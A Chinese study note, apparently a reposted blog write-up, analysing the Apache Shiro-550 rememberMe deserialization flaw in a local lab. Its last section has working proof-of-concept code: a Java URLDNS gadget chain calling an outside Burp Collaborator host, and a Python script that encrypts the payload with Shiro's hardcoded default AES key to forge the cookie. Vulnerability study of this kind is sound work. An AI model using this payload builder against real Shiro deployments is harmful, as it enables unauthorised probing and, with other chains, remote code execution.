【Java反序列化】Shiro-550漏洞分析笔记

目录

前言

一、漏洞原理

二、Shiro环境搭建

三、Shiro-550漏洞分析

解密分析

加密分析

四、URLDNS 链


前言

shiro-550反序列化漏洞大约在2016年就被披露了,在上学时期也分析过,最近在学CC链时有用到这个漏洞,重新分析下并做个笔记,也算是温故而知新了。

一、漏洞原理

Shiro<=1.2.4版本时,Shiro利用Cookie中的remeberMe去记住用户信息,其中remeberMe的生成会经过序列化-->AES加密-->Base64加密的过程,接收后会进行Base64解密-->AES解密-->反序列化进行验证身份信息。漏洞点在于AES加密为对称加密,而加密时利用的key为固定值,这就导致,我们可以生成一条恶意的payload,进而达到RCE的目的。

二、Shiro环境搭建

在IDEA创建个mvn项目,将github上面的项目导入到本地。

git clone https://github.com/apache/shiro.git

cd shiro

git checkout shiro-root-1.2.4

编辑shiro/samples/web目录下的pom.xml,添加jstl的版本为1.2

【Java反序列化】Shiro-550漏洞分析笔记_第1张图片

设置好Tomcat,运行就可以了。

【Java反序列化】Shiro-550漏洞分析笔记_第2张图片

三、Shiro-550漏洞分析

解密分析

已知,漏洞点出在Cookie:remeberMe字段中,全局搜索含有Cookie的类,其中CookieRemeberMeManager最符合漏洞信息。

【Java反序列化】Shiro-550漏洞分析笔记_第3张图片

其中getRememberedSerializedIdentity,看名字就能猜到为获取RememberMe序列化的认证信息。

【Java反序列化】Shiro-550漏洞分析笔记_第4张图片

该方法,首先判断是否为HTTP请求,如果为HTTP请求,则获取remeberMe的值,接着判断是否为deleteMe,不是则判断是否符合Base64的编码长度,然后对其Base64解码,并将解码结果返回。

跟进函数看一下,谁调用了getRememberedSerializedIdentity() 这个方法。

【Java反序列化】Shiro-550漏洞分析笔记_第5张图片

在getRememberedPrincipals方法中的convertBytesToPrincipals,从字面意思就能理解,转换字节为认证信息

跟进convertBytesToPrincipals方法

可以看出很明确做了两件事情,先使用decrypt进行解密,再利用deserialize进行反序列化

【Java反序列化】Shiro-550漏洞分析笔记_第6张图片

跟进decrypt方法

跟进getDecryptionCipherKey

【Java反序列化】Shiro-550漏洞分析笔记_第7张图片

跟进decryptionCipherKey

【Java反序列化】Shiro-550漏洞分析笔记_第8张图片

decryptionCipherKey为常量

【Java反序列化】Shiro-550漏洞分析笔记_第9张图片

看谁给decryptionCipherKey赋值

【Java反序列化】Shiro-550漏洞分析笔记_第10张图片

看谁调用了setCipherKey

【Java反序列化】Shiro-550漏洞分析笔记_第11张图片

查看该常量

【Java反序列化】Shiro-550漏洞分析笔记_第12张图片

该常量为key,也就是Shiro-550反序列化漏洞的关键点

然后再看下deserialize方法

【Java反序列化】Shiro-550漏洞分析笔记_第13张图片

看下谁调用了deserialize()这个接口方法

【Java反序列化】Shiro-550漏洞分析笔记_第14张图片

调用了readObject(),即反序列化漏洞的触发点。

【Java反序列化】Shiro-550漏洞分析笔记_第15张图片

加密分析

在 AbstractRememberMeManager 类的 onSuccessfulLogin 方法处打上断点,然后输入用户名密码进行登录,程序会运行到断点处停止。

【Java反序列化】Shiro-550漏洞分析笔记_第16张图片

if (isRememberMe(token))会判断用户是否勾选RememberMe

进入rememberIdentity() 方法

【Java反序列化】Shiro-550漏洞分析笔记_第17张图片

进入rememberIdentity

进入 convertPrincipalsToBytes() 方法,与解密分析中convertBytesToPrincipals() 方法相反

很明显的看出convertPrincipalsToBytes() 方法是对字段进行序列化操作,然后进行加密

【Java反序列化】Shiro-550漏洞分析笔记_第18张图片

进入getSerializer().serialize(principals) 方法

【Java反序列化】Shiro-550漏洞分析笔记_第19张图片

可以看到这里进行正常的序列化操作

【Java反序列化】Shiro-550漏洞分析笔记_第20张图片

再分析加密操作

进入encrypt方法

【Java反序列化】Shiro-550漏洞分析笔记_第21张图片

与解密类似,在getEncryptionCipherKey()获取密钥常量

【Java反序列化】Shiro-550漏洞分析笔记_第22张图片

跟进getEncryptionCipherKey()

接下来分析rememberSerializedIdentity

首先就是判断是否为HTTP请求

【Java反序列化】Shiro-550漏洞分析笔记_第23张图片

对序列化和AES加密后的内容进行Base64编码

【Java反序列化】Shiro-550漏洞分析笔记_第24张图片

整个加密流程分析完毕

四、URLDNS 链

通过漏洞原理可以知道,构造 Payload 需要将利用链通过 AES 加密后在 Base64 编码。将 Payload 的值设置为 rememberMe 的 cookie 值 。

找到网上写好的 URLDNS 链 进行构造

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class URLDNSEXP {
    public static void main(String[] args) throws Exception{
        HashMap hashmap= new HashMap();
        // 这里不要发起请求
        URL url = new URL("http://wlliprn8otqa42ej7qo4ihorpiv8jx.burpcollaborator.net");
        Class c = url.getClass();
        Field hashcodefile = c.getDeclaredField("hashCode");
        hashcodefile.setAccessible(true);
        hashcodefile.set(url,1234);
        hashmap.put(url,1);
        // 这里把 hashCode 改为 -1; 通过反射的技术改变已有对象的属性
        hashcodefile.set(url,-1);
        serialize(hashmap);
        //unserialize("ser.bin");
    }

    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

将序列化得到的 ser.bin 放到之前写好的 python 脚本去进行AES加密和Base64编码

# -*-* coding:utf-8

from email.mime import base
from pydoc import plain
import sys
import base64
from turtle import mode
import uuid
from random import Random
from Crypto.Cipher import AES


def get_file_data(filename):
 with open(filename, 'rb') as f:
  data = f.read()
 return data

def aes_enc(data):
 BS = AES.block_size
 pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
 key = "kPH+bIxk5D2deZiIxcaaaA=="
 mode = AES.MODE_CBC
 iv = uuid.uuid4().bytes
 encryptor = AES.new(base64.b64decode(key), mode, iv)
 ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))
 return ciphertext

def aes_dec(enc_data):
 enc_data = base64.b64decode(enc_data)
 unpad = lambda s: s[:-s[-1]]
 key = "kPH+bIxk5D2deZiIxcaaaA=="
 mode = AES.MODE_CBC
 iv = enc_data[:16]
 encryptor = AES.new(base64.b64decode(key), mode, iv)
 plaintext = encryptor.decrypt(enc_data[16:])
 plaintext = unpad(plaintext)
 return plaintext

if __name__ == "__main__":
 data = get_file_data("ser.bin")
 print(aes_enc(data))

获取的内容即为POC

使用Burp开启一个监听

【Java反序列化】Shiro-550漏洞分析笔记_第25张图片

将POC复制到RemeberMe字段上,且不包含JSESSIONID字段。当存在JSESSIONID字段时,RemeberMe字段不会被获取进行反序列化。

【Java反序列化】Shiro-550漏洞分析笔记_第26张图片

Burp收到请求,证明我们的Java反序列化漏洞利用成功。

【Java反序列化】Shiro-550漏洞分析笔记_第27张图片

Java反序列化漏洞的本意还是想要去执行RCE,网上有很多shiro的CC1链和CB1链攻击的POC,这里就不再复制粘贴了。

你可能感兴趣的:(代码审计,java,安全,web安全,shiro,网络安全)